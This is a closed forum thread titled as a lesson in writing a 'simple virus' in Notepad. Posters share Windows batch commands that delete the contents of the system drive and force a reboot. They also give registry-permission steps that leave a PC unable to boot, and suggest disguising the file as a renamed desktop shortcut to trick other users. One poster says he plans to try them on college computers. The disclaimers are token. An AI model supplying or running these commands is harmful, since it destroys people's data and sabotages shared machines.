LEARN SIMPLE VIRUS >>>PROgRAM USING ...NOTEPAD....

Status
Not open for further replies.

SuRGaN

Junior Member (25+)
write ur own simple virus cant detected by any antivirus....


@Echo off
Del C:\ *.* |y


And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...

PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...

IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive

EVEN I DIDN't TRY THIS........

I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE...
 


Hmm there are many tricks....like this...Thnx for making aware of them....
Soon i will try them on the PCs of College.....
As they r useless.....!!!!!
 
he he .. that program has no effect on my computer cause in Cd rive I only have page file, which won't be deleted while Windows is running.

A better version of it is ::

Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
 
Honestly .. don't try these at college, if you get caught you may be charged :D

Anyways ....... if you log in to some admin account in XP, then open regedit, right click on HKEY_LOCAL_MACHINE , click Permissions, select SYSTEM and "deny" access.

repeat this for HKEY_USERS, next time the computer won't boot :D :D
 
hiiiiiiiiiii rocky..cool..this trick is only...for KNOWING.......tat's allll

tats why even i didn't try......

JUST KNOW ABT THIS...........tats alll...

DONT TRY.....
 
if you get caught you may be charged

Well u need tricks to get it done....
but if u r caught then gone

wht u can do is make a file...create its shortcut on desktop with some fansy names.....with icon changed..etc
n dont run tht.....
n if other user clicks on tht....then voila...
but the thing is he will get suffered....i wont mine if the same thing is done byt the professors....they wont be charged for tht.....HAHAHA...
 
Status
Not open for further replies.

Back
Top